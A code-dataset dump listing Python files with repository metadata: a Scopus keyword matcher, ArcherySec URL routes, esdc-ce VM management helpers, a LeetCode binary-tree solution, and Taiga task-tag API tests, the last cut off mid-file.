max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
---|---|---|---|---|---|---|---|---|---|---|
src/main/NLP/STRING_MATCH/scopus_ha_module_match.py | alvinajacquelyn/COMP0016_2 | 0 | 9100 | import os, sys, re
import json
import pandas as pd
import pymongo
from main.LOADERS.publication_loader import PublicationLoader
from main.MONGODB_PUSHERS.mongodb_pusher import MongoDbPusher
from main.NLP.PREPROCESSING.preprocessor import Preprocessor
class ScopusStringMatch_HAmodule():
def __init__(self):
self.loader = PublicationLoader()
self.mongodb_pusher = MongoDbPusher()
self.preprocessor = Preprocessor()
def __progress(self, count, total, custom_text, suffix=''):
"""
Visualises progress for a process given a current count and a total count
"""
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '*' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s %s %s\r' %(bar, percents, '%', custom_text, suffix))
sys.stdout.flush()
def __read_keywords(self, data: dict) -> None:
"""
Given a set of publications in a dictionary, performs pre-processing for all string type data fields.
Performs look-up on HA keyword occurences in a document.
Results are pushed to MongoDB (backed-up in JSON file - scopus_matches.json).
"""
resulting_data = {}
counter = 0
keywords = self.preprocessor.preprocess_keywords("main/HA_KEYWORDS/HA_Keywords.csv")
num_publications = len(data)
num_keywords = len(keywords)
for doi, publication in data.items():
# visualise the progress on a commandline
self.__progress(counter, num_publications, "processing scopus_matches.json")
counter += 1
description = self.preprocessor.tokenize(publication["Description"])
ha_occurences = {} # accumulator for HA Keywords found in a given document
for n in range(num_keywords):
ha_num = n + 1
ha = "HA " + str(ha_num) if ha_num < num_keywords else "Misc" # clean and process the string for documenting occurences
ha_occurences[ha] = {"Word_Found": []}
for keyword in keywords[n]:
if keyword in description:
ha_occurences[ha]["Word_Found"].append(keyword)
if len(ha_occurences[ha]["Word_Found"]) == 0:
ha_occurences.pop(ha, None) # clear out empty occurences
resulting_data[doi] = {"DOI": doi, "Related_HA": ha_occurences}
print()
self.mongodb_pusher.matched_scopus(resulting_data) # push the processed data to MongoDB
print()
# Record the same data locally, acts as a backup
with open('main/NLP/STRING_MATCH/HA_MODULE_RESULTS/scopus_matches_modules.json', 'w') as outfile:
json.dump(resulting_data, outfile)
def run(self):
"""
Controller method for self class
Loads modules from a pre-loaded pickle file
"""
data = self.loader.load_all()
self.__read_keywords(data) | import os, sys, re
import json
import pandas as pd
import pymongo
from main.LOADERS.publication_loader import PublicationLoader
from main.MONGODB_PUSHERS.mongodb_pusher import MongoDbPusher
from main.NLP.PREPROCESSING.preprocessor import Preprocessor
class ScopusStringMatch_HAmodule():
def __init__(self):
self.loader = PublicationLoader()
self.mongodb_pusher = MongoDbPusher()
self.preprocessor = Preprocessor()
def __progress(self, count, total, custom_text, suffix=''):
"""
Visualises progress for a process given a current count and a total count
"""
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '*' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s %s %s\r' %(bar, percents, '%', custom_text, suffix))
sys.stdout.flush()
def __read_keywords(self, data: dict) -> None:
"""
Given a set of publications in a dictionary, performs pre-processing for all string type data fields.
Performs look-up on HA keyword occurences in a document.
Results are pushed to MongoDB (backed-up in JSON file - scopus_matches.json).
"""
resulting_data = {}
counter = 0
keywords = self.preprocessor.preprocess_keywords("main/HA_KEYWORDS/HA_Keywords.csv")
num_publications = len(data)
num_keywords = len(keywords)
for doi, publication in data.items():
# visualise the progress on a commandline
self.__progress(counter, num_publications, "processing scopus_matches.json")
counter += 1
description = self.preprocessor.tokenize(publication["Description"])
ha_occurences = {} # accumulator for HA Keywords found in a given document
for n in range(num_keywords):
ha_num = n + 1
ha = "HA " + str(ha_num) if ha_num < num_keywords else "Misc" # clean and process the string for documenting occurences
ha_occurences[ha] = {"Word_Found": []}
for keyword in keywords[n]:
if keyword in description:
ha_occurences[ha]["Word_Found"].append(keyword)
if len(ha_occurences[ha]["Word_Found"]) == 0:
ha_occurences.pop(ha, None) # clear out empty occurences
resulting_data[doi] = {"DOI": doi, "Related_HA": ha_occurences}
print()
self.mongodb_pusher.matched_scopus(resulting_data) # push the processed data to MongoDB
print()
# Record the same data locally, acts as a backup
with open('main/NLP/STRING_MATCH/HA_MODULE_RESULTS/scopus_matches_modules.json', 'w') as outfile:
json.dump(resulting_data, outfile)
def run(self):
"""
Controller method for self class
Loads modules from a pre-loaded pickle file
"""
data = self.loader.load_all()
self.__read_keywords(data) | en | 0.823004 | Visualises progress for a process given a current count and a total count Given a set of publications in a dictionary, performs pre-processing for all string type data fields.
Performs look-up on HA keyword occurences in a document.
Results are pushed to MongoDB (backed-up in JSON file - scopus_matches.json). # visualise the progress on a commandline # accumulator for HA Keywords found in a given document # clean and process the string for documenting occurences # clear out empty occurences # push the processed data to MongoDB # Record the same data locally, acts as a backup Controller method for self class
Loads modules from a pre-loaded pickle file | 2.758062 | 3 |
tools/urls.py | Cyberdeep/archerysec | 0 | 9101 | <reponame>Cyberdeep/archerysec
# _
# /\ | |
# / \ _ __ ___| |__ ___ _ __ _ _
# / /\ \ | '__/ __| '_ \ / _ \ '__| | | |
# / ____ \| | | (__| | | | __/ | | |_| |
# /_/ \_\_| \___|_| |_|\___|_| \__, |
# __/ |
# |___/
# Copyright (C) 2017-2018 ArcherySec
# This file is part of ArcherySec Project.
from django.conf.urls import url
from tools import views
app_name = 'tools'
urlpatterns = [
url(r'^sslscan/$',
views.sslscan,
name='sslscan'),
url(r'^sslscan_result/$',
views.sslscan_result,
name='sslscan_result'),
]
| # _
# /\ | |
# / \ _ __ ___| |__ ___ _ __ _ _
# / /\ \ | '__/ __| '_ \ / _ \ '__| | | |
# / ____ \| | | (__| | | | __/ | | |_| |
# /_/ \_\_| \___|_| |_|\___|_| \__, |
# __/ |
# |___/
# Copyright (C) 2017-2018 ArcherySec
# This file is part of ArcherySec Project.
from django.conf.urls import url
from tools import views
app_name = 'tools'
urlpatterns = [
url(r'^sslscan/$',
views.sslscan,
name='sslscan'),
url(r'^sslscan_result/$',
views.sslscan_result,
name='sslscan_result'),
] | en | 0.516802 | # _ # /\ | | # / \ _ __ ___| |__ ___ _ __ _ _ # / /\ \ | '__/ __| '_ \ / _ \ '__| | | | # / ____ \| | | (__| | | | __/ | | |_| | # /_/ \_\_| \___|_| |_|\___|_| \__, | # __/ | # |___/ # Copyright (C) 2017-2018 ArcherySec # This file is part of ArcherySec Project. | 1.743809 | 2 |
api/vm/base/utils.py | erigones/esdc-ce | 97 | 9102 | from core.celery.config import ERIGONES_TASK_USER
from que.tasks import execute, get_task_logger
from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress
logger = get_task_logger(__name__)
def is_vm_missing(vm, msg):
"""
Check failed command output and return True if VM is not on compute node.
"""
check_str = vm.hostname + ': No such zone configured'
return check_str in msg
def vm_delete_snapshots_of_removed_disks(vm):
"""
This helper function deletes snapshots for VM with changing disk IDs. Bug #chili-363
++ Bug #chili-220 - removing snapshot and backup definitions for removed disks.
"""
removed_disk_ids = [Snapshot.get_real_disk_id(i) for i in vm.create_json_update_disks().get('remove_disks', [])]
if removed_disk_ids:
Snapshot.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
SnapshotDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
Backup.objects.filter(vm=vm, disk_id__in=removed_disk_ids, last=True).update(last=False)
BackupDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
return removed_disk_ids
def _reset_allowed_ip_usage(vm, ip):
"""Helper function used below. It sets the IP usage back to VM [1] only if other VMs, which use the address in
allowed_ips are in notcreated state."""
if all(other_vm.is_notcreated() for other_vm in ip.vms.exclude(uuid=vm.uuid)):
ip.usage = IPAddress.VM
ip.save()
def _is_ip_ok(ip_queryset, vm_ip, vm_network_uuid):
"""Helper function used below. Return True if vm_ip (string) is "dhcp" or is found in the IPAddress queryset
and has the expected usage flag and subnet uuid."""
if vm_ip == 'dhcp':
return True
return any(ip.ip == vm_ip and ip.subnet.uuid == vm_network_uuid and ip.usage == IPAddress.VM_REAL
for ip in ip_queryset)
def vm_update_ipaddress_usage(vm):
"""
This helper function is responsible for updating IPAddress.usage and IPAddress.vm of server IPs (#chili-615,1029),
by removing association from IPs that, are not set on any NIC and:
- when a VM is deleted all IP usages are set to IPAddress.VM (in DB) and
- when a VM is created or updated all IP usages are set to IPAddress.VM_REAL (on hypervisor) and
Always call this function _only_ after vm.json_active is synced with vm.json!!!
In order to properly understand this code you have understand the association between an IPAddress and Vm model.
This function may raise a ValueError if the VM and IP address were not properly associated (e.g. via vm_define_nic).
"""
current_ips = set(vm.json_active_get_ips(primary_ips=True, allowed_ips=False))
current_ips.update(vm.json_get_ips(primary_ips=True, allowed_ips=False))
current_allowed_ips = set(vm.json_active_get_ips(primary_ips=False, allowed_ips=True))
current_allowed_ips.update(vm.json_get_ips(primary_ips=False, allowed_ips=True))
# Return old IPs back to IP pool, so they can be used again
vm.ipaddress_set.exclude(ip__in=current_ips).update(vm=None, usage=IPAddress.VM)
# Remove association of removed vm.allowed_ips
for ip in vm.allowed_ips.exclude(ip__in=current_allowed_ips):
ip.vms.remove(vm)
_reset_allowed_ip_usage(vm, ip)
if vm.is_notcreated():
# Server was deleted from hypervisor
vm.ipaddress_set.filter(usage=IPAddress.VM_REAL).update(usage=IPAddress.VM)
for ip in vm.allowed_ips.filter(usage=IPAddress.VM_REAL):
_reset_allowed_ip_usage(vm, ip)
return
# Server was updated or created
vm.ipaddress_set.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
vm.allowed_ips.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
# The VM configuration may be changed directly on the hypervisor, thus the VM could have
# new NICs and IP addresses which configuration bypassed our API - issue #168.
vm_ips = vm.ipaddress_set.select_related('subnet').filter(usage=IPAddress.VM_REAL)
vm_allowed_ips = vm.allowed_ips.select_related('subnet').filter(usage=IPAddress.VM_REAL)
# For issue #168 we have to check the VM<->IPAddress association in a loop for each NIC, because we need to
# match the NIC.network_uuid with a Subnet.
for nic_id, nic in enumerate(vm.json_active_get_nics(), 1):
network_uuid = nic.get('network_uuid', None)
if network_uuid:
ip = nic.get('ip', '')
allowed_ips = nic.get('allowed_ips', [])
if ip:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
for ip in allowed_ips:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_allowed_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s allowed IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
else:
raise ValueError('VM %s NIC ID %s does not have a network uuid!' % (vm, nic_id))
def vm_deploy(vm, force_stop=False):
"""
Internal API call used for finishing VM deploy;
Actually cleaning the json and starting the VM.
"""
if force_stop: # VM is running without OS -> stop
cmd = 'vmadm stop %s -F >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
else: # VM is stopped and deployed -> start
cmd = 'vmadm start %s >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
msg = 'Deploy server'
lock = 'vmadm deploy ' + vm.uuid
meta = {
'output': {
'returncode': 'returncode',
'stderr': 'message',
'stdout': 'json'
},
'replace_stderr': ((vm.uuid, vm.hostname),),
'msg': msg, 'vm_uuid': vm.uuid
}
callback = ('api.vm.base.tasks.vm_deploy_cb', {'vm_uuid': vm.uuid})
return execute(ERIGONES_TASK_USER, None, cmd, meta=meta, lock=lock, callback=callback,
queue=vm.node.fast_queue, nolog=True, ping_worker=False, check_user_tasks=False)
def vm_reset(vm):
"""
Internal API call used for VM reboots in emergency situations.
"""
cmd = 'vmadm stop %s -F; vmadm start %s' % (vm.uuid, vm.uuid)
return execute(ERIGONES_TASK_USER, None, cmd, callback=False, queue=vm.node.fast_queue, nolog=True,
check_user_tasks=False)
def vm_update(vm):
"""
Internal API used for updating VM if there were changes in json detected.
"""
logger.info('Running PUT vm_manage(%s), because something (vnc port?) has changed', vm)
from api.vm.base.views import vm_manage
from api.utils.request import get_dummy_request
from api.utils.views import call_api_view
request = get_dummy_request(vm.dc, method='PUT', system_user=True)
res = call_api_view(request, 'PUT', vm_manage, vm.hostname)
if res.status_code == 201:
logger.warn('PUT vm_manage(%s) was successful: %s', vm, res.data)
else:
logger.error('PUT vm_manage(%s) failed: %s (%s): %s', vm, res.status_code, res.status_text, res.data)
| from core.celery.config import ERIGONES_TASK_USER
from que.tasks import execute, get_task_logger
from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress
logger = get_task_logger(__name__)
def is_vm_missing(vm, msg):
"""
Check failed command output and return True if VM is not on compute node.
"""
check_str = vm.hostname + ': No such zone configured'
return check_str in msg
def vm_delete_snapshots_of_removed_disks(vm):
"""
This helper function deletes snapshots for VM with changing disk IDs. Bug #chili-363
++ Bug #chili-220 - removing snapshot and backup definitions for removed disks.
"""
removed_disk_ids = [Snapshot.get_real_disk_id(i) for i in vm.create_json_update_disks().get('remove_disks', [])]
if removed_disk_ids:
Snapshot.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
SnapshotDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
Backup.objects.filter(vm=vm, disk_id__in=removed_disk_ids, last=True).update(last=False)
BackupDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
return removed_disk_ids
def _reset_allowed_ip_usage(vm, ip):
"""Helper function used below. It sets the IP usage back to VM [1] only if other VMs, which use the address in
allowed_ips are in notcreated state."""
if all(other_vm.is_notcreated() for other_vm in ip.vms.exclude(uuid=vm.uuid)):
ip.usage = IPAddress.VM
ip.save()
def _is_ip_ok(ip_queryset, vm_ip, vm_network_uuid):
"""Helper function used below. Return True if vm_ip (string) is "dhcp" or is found in the IPAddress queryset
and has the expected usage flag and subnet uuid."""
if vm_ip == 'dhcp':
return True
return any(ip.ip == vm_ip and ip.subnet.uuid == vm_network_uuid and ip.usage == IPAddress.VM_REAL
for ip in ip_queryset)
def vm_update_ipaddress_usage(vm):
"""
This helper function is responsible for updating IPAddress.usage and IPAddress.vm of server IPs (#chili-615,1029),
by removing association from IPs that, are not set on any NIC and:
- when a VM is deleted all IP usages are set to IPAddress.VM (in DB) and
- when a VM is created or updated all IP usages are set to IPAddress.VM_REAL (on hypervisor) and
Always call this function _only_ after vm.json_active is synced with vm.json!!!
In order to properly understand this code you have understand the association between an IPAddress and Vm model.
This function may raise a ValueError if the VM and IP address were not properly associated (e.g. via vm_define_nic).
"""
current_ips = set(vm.json_active_get_ips(primary_ips=True, allowed_ips=False))
current_ips.update(vm.json_get_ips(primary_ips=True, allowed_ips=False))
current_allowed_ips = set(vm.json_active_get_ips(primary_ips=False, allowed_ips=True))
current_allowed_ips.update(vm.json_get_ips(primary_ips=False, allowed_ips=True))
# Return old IPs back to IP pool, so they can be used again
vm.ipaddress_set.exclude(ip__in=current_ips).update(vm=None, usage=IPAddress.VM)
# Remove association of removed vm.allowed_ips
for ip in vm.allowed_ips.exclude(ip__in=current_allowed_ips):
ip.vms.remove(vm)
_reset_allowed_ip_usage(vm, ip)
if vm.is_notcreated():
# Server was deleted from hypervisor
vm.ipaddress_set.filter(usage=IPAddress.VM_REAL).update(usage=IPAddress.VM)
for ip in vm.allowed_ips.filter(usage=IPAddress.VM_REAL):
_reset_allowed_ip_usage(vm, ip)
return
# Server was updated or created
vm.ipaddress_set.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
vm.allowed_ips.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
# The VM configuration may be changed directly on the hypervisor, thus the VM could have
# new NICs and IP addresses which configuration bypassed our API - issue #168.
vm_ips = vm.ipaddress_set.select_related('subnet').filter(usage=IPAddress.VM_REAL)
vm_allowed_ips = vm.allowed_ips.select_related('subnet').filter(usage=IPAddress.VM_REAL)
# For issue #168 we have to check the VM<->IPAddress association in a loop for each NIC, because we need to
# match the NIC.network_uuid with a Subnet.
for nic_id, nic in enumerate(vm.json_active_get_nics(), 1):
network_uuid = nic.get('network_uuid', None)
if network_uuid:
ip = nic.get('ip', '')
allowed_ips = nic.get('allowed_ips', [])
if ip:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
for ip in allowed_ips:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_allowed_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s allowed IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
else:
raise ValueError('VM %s NIC ID %s does not have a network uuid!' % (vm, nic_id))
def vm_deploy(vm, force_stop=False):
"""
Internal API call used for finishing VM deploy;
Actually cleaning the json and starting the VM.
"""
if force_stop: # VM is running without OS -> stop
cmd = 'vmadm stop %s -F >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
else: # VM is stopped and deployed -> start
cmd = 'vmadm start %s >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
msg = 'Deploy server'
lock = 'vmadm deploy ' + vm.uuid
meta = {
'output': {
'returncode': 'returncode',
'stderr': 'message',
'stdout': 'json'
},
'replace_stderr': ((vm.uuid, vm.hostname),),
'msg': msg, 'vm_uuid': vm.uuid
}
callback = ('api.vm.base.tasks.vm_deploy_cb', {'vm_uuid': vm.uuid})
return execute(ERIGONES_TASK_USER, None, cmd, meta=meta, lock=lock, callback=callback,
queue=vm.node.fast_queue, nolog=True, ping_worker=False, check_user_tasks=False)
def vm_reset(vm):
"""
Internal API call used for VM reboots in emergency situations.
"""
cmd = 'vmadm stop %s -F; vmadm start %s' % (vm.uuid, vm.uuid)
return execute(ERIGONES_TASK_USER, None, cmd, callback=False, queue=vm.node.fast_queue, nolog=True,
check_user_tasks=False)
def vm_update(vm):
"""
Internal API used for updating VM if there were changes in json detected.
"""
logger.info('Running PUT vm_manage(%s), because something (vnc port?) has changed', vm)
from api.vm.base.views import vm_manage
from api.utils.request import get_dummy_request
from api.utils.views import call_api_view
request = get_dummy_request(vm.dc, method='PUT', system_user=True)
res = call_api_view(request, 'PUT', vm_manage, vm.hostname)
if res.status_code == 201:
logger.warn('PUT vm_manage(%s) was successful: %s', vm, res.data)
else:
logger.error('PUT vm_manage(%s) failed: %s (%s): %s', vm, res.status_code, res.status_text, res.data)
| en | 0.913991 | Check failed command output and return True if VM is not on compute node. This helper function deletes snapshots for VM with changing disk IDs. Bug #chili-363 ++ Bug #chili-220 - removing snapshot and backup definitions for removed disks. Helper function used below. It sets the IP usage back to VM [1] only if other VMs, which use the address in allowed_ips are in notcreated state. Helper function used below. Return True if vm_ip (string) is "dhcp" or is found in the IPAddress queryset and has the expected usage flag and subnet uuid. This helper function is responsible for updating IPAddress.usage and IPAddress.vm of server IPs (#chili-615,1029), by removing association from IPs that, are not set on any NIC and: - when a VM is deleted all IP usages are set to IPAddress.VM (in DB) and - when a VM is created or updated all IP usages are set to IPAddress.VM_REAL (on hypervisor) and Always call this function _only_ after vm.json_active is synced with vm.json!!! In order to properly understand this code you have understand the association between an IPAddress and Vm model. This function may raise a ValueError if the VM and IP address were not properly associated (e.g. via vm_define_nic). # Return old IPs back to IP pool, so they can be used again # Remove association of removed vm.allowed_ips # Server was deleted from hypervisor # Server was updated or created # The VM configuration may be changed directly on the hypervisor, thus the VM could have # new NICs and IP addresses which configuration bypassed our API - issue #168. # For issue #168 we have to check the VM<->IPAddress association in a loop for each NIC, because we need to # match the NIC.network_uuid with a Subnet. Internal API call used for finishing VM deploy; Actually cleaning the json and starting the VM. # VM is running without OS -> stop # VM is stopped and deployed -> start Internal API call used for VM reboots in emergency situations. Internal API used for updating VM if there were changes in json detected. | 2.134816 | 2 |
993_Cousins-in-Binary-Tree.py | Coalin/Daily-LeetCode-Exercise | 3 | 9103 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
x_depth = None
x_parent = None
x_found = 0
y_depth = None
y_parent = None
y_found = 0
def dfs(node, parent, depth):
nonlocal x_depth, x_parent, x_found, y_depth, y_found, y_parent
if not node:
return
if node.val == x:
x_depth = depth
x_parent = parent
x_found = 1
elif node.val == y:
y_depth = depth
y_parent = parent
y_found = 1
if x_found and y_found:
return
dfs(node.left, node, depth+1)
if x_found and y_found:
return
dfs(node.right, node, depth+1)
dfs(root, None, 0)
return x_depth == y_depth and x_parent != y_parent
| # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
x_depth = None
x_parent = None
x_found = 0
y_depth = None
y_parent = None
y_found = 0
def dfs(node, parent, depth):
nonlocal x_depth, x_parent, x_found, y_depth, y_found, y_parent
if not node:
return
if node.val == x:
x_depth = depth
x_parent = parent
x_found = 1
elif node.val == y:
y_depth = depth
y_parent = parent
y_found = 1
if x_found and y_found:
return
dfs(node.left, node, depth+1)
if x_found and y_found:
return
dfs(node.right, node, depth+1)
dfs(root, None, 0)
return x_depth == y_depth and x_parent != y_parent
| en | 0.53741 | # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right | 3.741704 | 4 |
docker-images/taigav2/taiga-back/tests/integration/test_tasks_tags.py | mattcongy/itshop | 1 | 9104 | # -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from unittest import mock
from collections import OrderedDict
from django.core.urlresolvers import reverse
from taiga.base.utils import json
from .. import factories as f
import pytest
pytestmark = pytest.mark.django_db
def test_api_task_add_new_tags_with_error(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [],
"version": task.version
}
client.login(task.owner)
data["tags"] = [1]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back", "#cccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [[1, "#ccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
def test_api_task_add_new_tags_without_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", None],
["front", None],
["ux", None]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
def test_api_task_add_new_tags_with_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", "#fff8e7"],
["front", None],
["ux", "#fabada"]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
def test_api_create_new_task_with_tags(client):
project = f.ProjectFactory.create(tags_colors=[["front", "#aaaaaa"], ["ux", "#fabada"]])
status = f.TaskStatusFactory.create(project=project)
project.default_task_status = status
project.save()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
url = reverse("tasks-list")
data = {
"subject": "Test user story",
"project": project.id,
"tags": [
["back", "#fff8e7"],
["front", "#bbbbbb"],
["ux", None]
]
}
client.login(project.owner)
response = client.json.post(url, json.dumps(data))
assert response.status_code == 201, response.data
task_tags_colors = OrderedDict(response.data["tags"])
assert task_tags_colors["back"] == "#fff8e7"
assert task_tags_colors["front"] == "#aaaaaa"
assert task_tags_colors["ux"] == "#fabada"
tags_colors = OrderedDict(project.tags_colors)
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
assert tags_colors["front"] == "#aaaaaa"
| # -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from unittest import mock
from collections import OrderedDict
from django.core.urlresolvers import reverse
from taiga.base.utils import json
from .. import factories as f
import pytest
pytestmark = pytest.mark.django_db
def test_api_task_add_new_tags_with_error(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [],
"version": task.version
}
client.login(task.owner)
data["tags"] = [1]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back", "#cccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [[1, "#ccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
def test_api_task_add_new_tags_without_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", None],
["front", None],
["ux", None]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
def test_api_task_add_new_tags_with_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", "#fff8e7"],
["front", None],
["ux", "#fabada"]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
def test_api_create_new_task_with_tags(client):
project = f.ProjectFactory.create(tags_colors=[["front", "#aaaaaa"], ["ux", "#fabada"]])
status = f.TaskStatusFactory.create(project=project)
project.default_task_status = status
project.save()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
url = reverse("tasks-list")
